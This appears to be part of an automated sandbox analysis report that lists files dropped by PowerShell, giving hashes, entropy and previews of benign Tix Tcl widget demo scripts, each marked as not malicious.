                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: CmpImg2.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates how to use the compound image inside NoteBook..# widgets. This file is basically a cross-over of NoteBook.tcl and CmpImg.tcl..#..proc RunSample {w} {.... # Create the notebook widget and set its backpagecolor to gray... # Note that the -backpagecolor option belongs to the "nbframe".. # subwidget... tixNoteBook $w.nb -ipadx 6 -ipady 6.. $w config -bg gray.. $w.nb subwidget nbframe config -backpagecolor gray -tabpady 0.... # Create the two compound images.. #.. #.... #
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2621
                                                                                                                                                                                                              Entropy (8bit):4.75520307588664
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:dyXv8hcyfyEZQ1qLg1yxBZD08Hwv3fWtTKxSv9uBk5PflmrJY0x87AP1Ri:0f0cyv2Y12Ewv3fWsxSv9xf0i0KA3i
                                                                                                                                                                                                              MD5:C9512DCA6AD7244DA895B1D13B9C0D0A
                                                                                                                                                                                                              SHA1:51362FAFE15CE6D205E20454202AFA067F4C1FBC
                                                                                                                                                                                                              SHA-256:E7B212552A1894AA206D893D7482DB1043F540A0CCF6E75C1149224D750C4F02
                                                                                                                                                                                                              SHA-512:505692DD5DAB5F857B3BF7453FCA8314FB78B48282928E021D0DBD70C87DF55F8FCEE0FD74CA61AC9C33DC8DF46D03C1226C08738B7B2BF3774403FDED1CB4A3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: CmpImg3.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# Demonstrates how to use compound images to display icons in a canvas widget...#....proc RunSample {w} {.. set top [frame $w.f -bd 1 -relief raised].. set box [tixButtonBox $w.b -bd 1 -relief raised].... pack $box -side bottom -fill both.. pack $top -side top -fill both -expand yes.... label $top.lab -text "Drag the icons".. pack $top.lab -anchor c -side top -pady 4.... # Create the canvas to display the icons.. #.. set c [canvas $top.c -relief sunken -bd 1].. pack $c -side top -expand yes -
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4430
                                                                                                                                                                                                              Entropy (8bit):4.740377649708322
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:tfBZ5xhx9dgwovaBcDpaYcX9Sn3U9753i:tnlovaBcDpaYcX8k975y
                                                                                                                                                                                                              MD5:1D6523D202676568D180F77F9B670851
                                                                                                                                                                                                              SHA1:91A7DA13B695412A83D18DB37126E924CFA8716A
                                                                                                                                                                                                              SHA-256:1E9F30E018BEFA4975C07C316925A6DD44C12513B33E7728F634A5C9FB47438A
                                                                                                                                                                                                              SHA-512:DD95F657DFC98D3FD6404E768A6269007FBE6DD0AF8BF0977C4490334433E5ABF1CF028FB8E4EB0AF552CF4A82EB5F467B78015BEF4CD052D00E85FA9949D584
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: CmpImg4.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates how to use the compound image to add..# colors in Notebook tabs...#..proc RunSample {w} {.... # Create the notebook widget and set its backpagecolor to gray... # Note that the -backpagecolor option belongs to the "nbframe".. # subwidget... tixNoteBook $w.nb -ipadx 6 -ipady 6.. # $w config -bg gray.. # $w.nb subwidget nbframe config -backpagecolor gray -tabpady 0.... # Create the two compound images --.. #.. # Create the first image:.. #.. # Notice that the -window
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3665
                                                                                                                                                                                                              Entropy (8bit):4.754880304067092
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cyXvk/CLiUlT8I5ygW3kocqx+z+iwdmqxzANhp26/bH7YUkwA9fZFr4ksJlP1Ri:vf2Ul6hANTLbblkwKfZFdg3i
                                                                                                                                                                                                              MD5:59A94CE341BE4F26AB9693B2A7AEE4F9
                                                                                                                                                                                                              SHA1:947530B3983B223D173A1E4A9F7738A1EE3C9C0D
                                                                                                                                                                                                              SHA-256:41BED1E52E830D86C1CC69C2054E3E4078A17C29AEC0F89E217D39A6A3F9AD96
                                                                                                                                                                                                              SHA-512:3F10383A6314A8F15F810E3F1772ED0EA7C91BC959C505A0ACD5783FC2DC754B92C71E7046601B64351C50F2175BC8F3C855B1A5228271E544F9E2BAE452F20D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: ComboBox.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixComboBox widget, which is close..# to the MS Window Combo Box control...#..proc RunSample {w} {.... # Create the comboboxes on the top of the dialog box.. #.. frame $w.top -border 1 -relief raised.... # $w.top.a is a drop-down combo box. It is not editable -- who wants.. # to invent new months?.. #.. # [Hint] The -options switch sets the options of the subwidgets... # [Hint] We set the label.width subwidget option of both comboboxes to .. # be 1
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3721
                                                                                                                                                                                                              Entropy (8bit):4.85417993813678
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:c0fTBjnGUllnat2t9L4UfZvdbLQ4P2Nza+7F93i:F7Bjht90mZRB+vy
                                                                                                                                                                                                              MD5:BE947F6E83B11B3AA2437AAD9670B57F
                                                                                                                                                                                                              SHA1:B910FAD24CDEB9479FC32B3F00A9E61EBD689BCB
                                                                                                                                                                                                              SHA-256:00603E5E7409DDA458D5D11F45FC2E77E71E93EE846B2B1021A429002145DD45
                                                                                                                                                                                                              SHA-512:F7CD25177BBE929FD7E824194F8C82468605EF29308AEFFF75C530FDECF71C4DE11B873C31DD5F57D7792C7E31FC020C68644B34044633EA9958AD6E32D5385A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Control.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixControl widget -- it is an..# entry widget with up/down arrow buttons. You can use the arrow buttons..# to adjust the value inside the entry widget...#..# This example program uses three Control widgets. One lets you select..# integer values; one lets you select floating point values and the last..# one lets you select a few names...#..proc RunSample {w} {.... # Create the tixControls on the top of the dialog box.. #.. frame $w.top -border 1 -relief raised.... # $w.to
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2587
                                                                                                                                                                                                              Entropy (8bit):4.827558265740077
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:9byXvHUvuT8NEhMuxUoQme4OPwPN9fZvr4ksJXEkX2cZneiP1Ri:9efbWE/moxefPwPzfZvdqX2a93i
                                                                                                                                                                                                              MD5:A25422FDB796D833CF40537A45B0916C
                                                                                                                                                                                                              SHA1:8919F21FCBE0598A76F8B6DD435B9A8A4EF164EF
                                                                                                                                                                                                              SHA-256:771000F308BAB1FB8B6878F98D3BB051582C1A28BAA0202E9D61730F25036517
                                                                                                                                                                                                              SHA-512:7AB755B5EEDECA5449A0120A5C13E9DA0C1141434DB754550531CD3995EA846A5FC040F6F85337944CE61051F5949D0E4430C76ACC0C7E908CD9E5F5DC30B549
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DirDlg.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixDirSelectDialog widget:..# it allows the user to select a directory...#..proc RunSample {w} {.... # Create an entry for the user to input a directory. If he can't.. # bother to type in the name, he can press the "Browse ..." button.. # and call up the diretcory dialog.. #.. frame $w.top -border 1 -relief raised.... tixLabelEntry $w.top.ent -label "Select A Directory:" -labelside top \...-options {... entry.width 25... entry.textVariable demo_ddlg_dirname...
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2848
                                                                                                                                                                                                              Entropy (8bit):4.770008125524358
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:9CyXviIK4x65kSLYlT89eSUxak1vsSgTMuxLl4D0wPgIPN9fZZSr4ksJrFeiP1RC:9xfhKl5LYlH8JxJlpwPgIPzfZgduF93C
                                                                                                                                                                                                              MD5:9A4EB5E4602EC38DED1FEF19FEC619F2
                                                                                                                                                                                                              SHA1:11F9B87503B136BA264A0B47BC5D378B4D8A4B6F
                                                                                                                                                                                                              SHA-256:E18EBA1750AA57F3A447A43141F9D7B3E96DA2A9AF8604B1DAB7D75959239AE4
                                                                                                                                                                                                              SHA-512:C472C1CA7B64313B1CC974D332909D13342A4DD84C040F3406B9B6792E92A918A2929BEA4B43A5037C86A53B2106C5F3C7502CA322AE52AAE3E39A6D5DFF68E3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DirList.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixDirList widget -- you can..# use it for the user to select a directory. For example, an installation..# program can use the tixDirList widget to ask the user to select the..# installation directory for an application...#..proc RunSample {w} {.... # Create the tixDirList and the tixLabelEntry widgets on the on the top.. # of the dialog box.. #.. frame $w.top -border 1 -relief raised.... # Create the DirList widget. By default it will show the current.. # director
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2825
                                                                                                                                                                                                              Entropy (8bit):4.753854518864445
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:9OyXviIK4x61kSLYlT89WxWUfRvsSg7MuxTx4D0gI/N9fZ4r4ksJvG5VeiP1RC:9lfhK55LYl6JphxpgI/zfZ4dSiV93C
                                                                                                                                                                                                              MD5:9D7DA630560322B94E4E881BB919C405
                                                                                                                                                                                                              SHA1:897251FDEF45A1DDD305B67FB10EC798D288CCF0
                                                                                                                                                                                                              SHA-256:8C1E0D2FE64CE8DD844D812A1AADDD3A509B01D2520DC00A8AE64A0B8D3F9A78
                                                                                                                                                                                                              SHA-512:98837FB3940723DE208B444CE0473736E58507B01FB1F8488D560B8E7528C92DC3E3BADCD23B735B511E78A7307CF77D9AC2216A3610C7105EAB168CF6CA3A66
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DirTree.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixDirTree widget -- you can..# use it for the user to select a directory. For example, an installation..# program can use the tixDirList widget to ask the user to select the..# installation directory for an application...#..proc RunSample {w} {.... # Create the tixDirTree and the tixLabelEntry widgets on the on the top.. # of the dialog box.. #.. frame $w.top -border 1 -relief raised.... # Create the DirTree widget. By default it will show the current.. # director
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1662
                                                                                                                                                                                                              Entropy (8bit):4.849671840767721
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:IyXvybmmJ1Js7FGD7r7+XXm4XZwZzeiP1R7:jfyyS1Js7Flm4pKz937
                                                                                                                                                                                                              MD5:5479215485D60BBF58776A384D94FC08
                                                                                                                                                                                                              SHA1:3F777B5E91B0F042B946A75B3CB0B6DB7FFA334E
                                                                                                                                                                                                              SHA-256:2CA6A4BB39B6DE4DECABC03077DC2CE035364FD8ED597069246F020AD451CBC8
                                                                                                                                                                                                              SHA-512:6370CF93D01BA712FC64BA10D822432DEC302982B2F83200FC6748B423B968C3615167977B29BD367642542B8B188B210CBCD128E3E187B4D6D7BEE420BB28D5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DragDrop.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the Drag+Drop features in Tix. Drag+Drop is still..# experimental in Tix. Please don't use. For your eyes only...#..#..proc RunSample {w} {.... text $w.d -height 5.. $w.d insert end {Quick and dirty example:..click on any node on on the directory lists and drag. You can see the..cursor change its shape. The "dropsite" of the directory lists will be..highlighted when you drag the cursor accorss the directory nodes...Nothing will happen when you drop. }.... pack $w.d -padx 10 -pady 5....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3916
                                                                                                                                                                                                              Entropy (8bit):4.749289469633478
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Lf5Ql8hHfZKdE7ix/eTsxZLL7kGf3T93b:LhdZicgxZPlPpr
                                                                                                                                                                                                              MD5:56078EA1215D5D687E0836DB58D45C3F
                                                                                                                                                                                                              SHA1:723AC21C2232819E112943CAD3B8AEA806F43D4B
                                                                                                                                                                                                              SHA-256:32E4DEF921AD1727E7B0CEBBF17E0DBCBDA2F20E4B5A6271AFE4C31DC7ACAF17
                                                                                                                                                                                                              SHA-512:1A6DB7C0A9B5240335DF0A264996D6C2289B65892F37B188372E7D7476850133A20DE580EEFEAE9504072B6109CD51AC67518651CA4A491E56F9BADF796C3A35
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DynTree.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates how to use the TixTree widget to display..# dynamic hierachical data (the files in the Unix file system)..#....proc RunSample {w} {.... # We create the frame and the ScrolledHList widget.. # at the top of the dialog box.. #.. frame $w.top -relief raised -bd 1.... # Create a TixTree widget to display the hypothetical DOS disk drive.. # .. #.. tixTree $w.top.a -options {...hlist.separator "/"...hlist.width 35...hlist.height 25.. }.... pack $w.top.a -expand yes -fill bo
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3226
                                                                                                                                                                                                              Entropy (8bit):4.799298805366567
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:CAyXvpUTT8N1/MuxzXQ/e4OPwPN9fZYr4ksJ2bI5PX6MUGpmDc+0wKZaeiP1Ri:CbfeW1FFX6efPwPzfZYdQlU0xwf93i
                                                                                                                                                                                                              MD5:84553FB2AA32129890B39451CBB98344
                                                                                                                                                                                                              SHA1:3B46972C1F52F94B15AC981AC7A03ED61BD807C7
                                                                                                                                                                                                              SHA-256:976507A1BB4130F3057CEB9ABE14D3D8D1DF162234F185B1336F9C28323606E9
                                                                                                                                                                                                              SHA-512:98E7A815808E76A90740600467B3A09B5316C359F2F454C95234D4347AE4EF1A0AA9C913DCE7AE03FA289EB081A1694E09B4DC9AF42F5F627A7796E2485F2935
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: EFileDlg.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixExFileSelectDialog widget --..# This is a neat file selection dialog that will make your apps look..# real good!..#..proc RunSample {w} {.... # Create an entry for the user to input a filename. If he can't.. # bother to type in the name, he can press the "Browse ..." button.. # and call up the file dialog.. #.. frame $w.top -border 1 -relief raised.... tixLabelEntry $w.top.ent -label "Select A File:" -labelside top \...-options {... entry.width 25... entr
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7019
                                                                                                                                                                                                              Entropy (8bit):4.848706765990951
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:AfaA/PqW12QzzDrsmLiSILKgewm25dJiHNyk34E6hD1Kf1R3i:ACh+/PtuRg4CHkk34hhDcfy
                                                                                                                                                                                                              MD5:8D60FAEC3D6658B7B65160C49905BF8C
                                                                                                                                                                                                              SHA1:15FEF2060C018E3E100E7019C58C9DE2722E50E6
                                                                                                                                                                                                              SHA-256:94FF581A620A08C4C5AC9AC16A7EFDD6DAE05F9D16D9AEBDBE3E3F0CAD7EA712
                                                                                                                                                                                                              SHA-512:7EFBEBBBE9D2739881D9964054A06EA0FED177CAE4E0A0573E1DC322A3646ADFE4D99D3140AE2EA1C05BDB59D88C49D66360D54A7A2965F04F211FB605553701
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: EditGrid.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# Demonstrates the use of editable entries in a Grid widget...#....proc RunSample {w} {.. global editgrid.... wm title $w "Doe Inc. Performance".. wm geometry $w 640x300.... label $w.lab -justify left -text \.."The left column is calculated automatically. To calculate the right column,..press the \"Calculate\" button".. pack $w.lab -side top -anchor c -padx 3 -pady 3.... # Create the buttons.. #.. set f [frame $w.f -relief flat].. pack $f -side right -fill y.. set add [button $f.add -tex
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3111
                                                                                                                                                                                                              Entropy (8bit):4.776603052265696
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:UyXvjMUUTT8N1qMux6QQwe4OPwPN9fZRr4ksJ+B7bI5PX6MUGp9SBzMBSZaeiP10:nfjOW1uAQrefPwPzfZRdlUlUWSRMF93i
                                                                                                                                                                                                              MD5:63A2B20B83CF50004B8F17FA3EDA6B30
                                                                                                                                                                                                              SHA1:AA737AF945E8CEF1154357808EE8CB9DA2BCF4A5
                                                                                                                                                                                                              SHA-256:F92751D5AC23BA3C11D8C5DB5FFC48E4853C3DD9452DACFA7340DFEAD62DFD17
                                                                                                                                                                                                              SHA-512:062948C5A04152946793153AFD743934E14FB098CFA07BFE8249E12BDFB51A09624AC8ED264ECEF0F69CBF26E73415023B3A3DD8675C6599592330CF922961A3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: FileDlg.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixFileSelectDialog widget --..# This is a neat file selection dialog that looks like the Motif ..# file-selection dialog widget. I know that Motif sucks, but ..# tixFileSelectDialog looks neat nevertheless...#..proc RunSample {w} {.... # Create an entry for the user to input a filename. If he can't.. # bother to type in the name, he can press the "Browse ..." button.. # and call up the file dialog.. #.. frame $w.top -border 1 -relief raised.... tixLabelEntry $w.to
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2295
                                                                                                                                                                                                              Entropy (8bit):4.858363154028793
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:zAyXvly+wGUlT8FtJy+QJyZ+Sk9fZH5r4ks1ahHG7tneiP1Ri:ffTrUlq22WfZH5doaIV93i
                                                                                                                                                                                                              MD5:B71847A78A37F1AD3D03D8FFDB90BB6F
                                                                                                                                                                                                              SHA1:F82A8726085085F3F899E2960E4F5D775AFAED80
                                                                                                                                                                                                              SHA-256:A89E7ACBF7EDB46B8BCD0ADC2C7E679D8F0CF586E2190E0131D6DC938087BDD2
                                                                                                                                                                                                              SHA-512:90291BA9D3509AD84A6CCBF4EF1576649656E4377E531ECC9B8F93936AC9CE4F3F2CB6FC8E653F8F7E30185247EC6050CA42CA32FA8C8EFF631B6FEA5ECA305C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: FileEnt.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixFileEntry widget -- an..# easy of letting the user select a filename..#..proc RunSample {w} {.... # Create the tixFileEntry's on the top of the dialog box.. #.. frame $w.top -border 1 -relief raised.... global demo_fent_from demo_fent_to.... tixFileEntry $w.top.a -label "Move File From: " \...-variable demo_fent_from \...-options {... entry.width 25... label.width 16... label.underline 10... label.anchor e...}.... tixFileEntry $w.top.b -label "To: "
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4794
                                                                                                                                                                                                              Entropy (8bit):4.867851415849727
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:zbfY5LYmWelKNdG4dkl7skfPJfZsdcyrh/qh2gKl93b:fQZW3G4ymGPVZuPDr
                                                                                                                                                                                                              MD5:3EFDDC379F12A814009ABB2D60470208
                                                                                                                                                                                                              SHA1:47F85DD86840B530976176FEF0CCB3E04B3C6908
                                                                                                                                                                                                              SHA-256:783589DB01D682D4CF114562799A93225F44334AF8757EB628D32E57955D81EE
                                                                                                                                                                                                              SHA-512:07B973B82E435ED515913AF10ED21843E6AA2275B9794971BFBECDA68AAE6B73D29C0B182A06E6071A65FFCB6A61520FA1F7D7624F13E67AE47205C8161EFF3E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: HList1.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixHList widget -- you can..# use to display data in a tree structure. For example, your family tree..#..#..proc RunSample {w} {.... # Create the tixHList and the tixLabelEntry widgets on the on the top.. # of the dialog box.. #.. # [Hint] We create the tixHList and and the scrollbar by ourself,.. #. but it is more convenient to use the tixScrolledHlist widget.. #. which does all the chores for us... #.. # [Hint] Use of the -browsecmd and -command opti
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2867
                                                                                                                                                                                                              Entropy (8bit):4.812024536570465
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:yyXvnlAyLRRMjUlT8W5ygpkChx7k1b+3xZZfK6xZZfEL95xZZfsa9fZ2r4ksJBhe:hfayWUl/y98UfZ2dQ93i
                                                                                                                                                                                                              MD5:6F637A2AB3FC9668C46BAD352139608E
                                                                                                                                                                                                              SHA1:007A930BA8853A6B600C70429EEC9CE1273FC16F
                                                                                                                                                                                                              SHA-256:88899F54110824D56D7FB57F5ECD5B97EAA7984C13E53DCEC05D1BA1F3E8B8B7
                                                                                                                                                                                                              SHA-512:1DFDE049FEC150DB346FA58E0E1B9DC147F149E319C5B3217C087CCCD583739FBE619D05DCC02ACD8AA2369481A966C8EC72823D191F9C582ACE2DE2D6458574
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: LabEntry.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixLabelEntry widget -- an entry that..# come with a label at its side, so you don't need to create..# extra frames on your own and do the messy hierarchical packing. This..# example is adapted from the tixControl example, except now you don't..# have arrow buttons to adjust the values for you .....#....proc RunSample {w} {.... # Create the tixLabelEntrys on the top of the dialog box.. #.. frame $w.top -border 1 -relief raised.... # $w.top.a allows only integer values..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2872
                                                                                                                                                                                                              Entropy (8bit):4.788564607673201
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:5yXvXAqtECEPOPjS5T84t2S4DNCDofeDsPwzwsdZsNsk34wM9fZNr4ksJmeiP1Ri:ofQN1dt9BDsowesykow+fZNdf93i
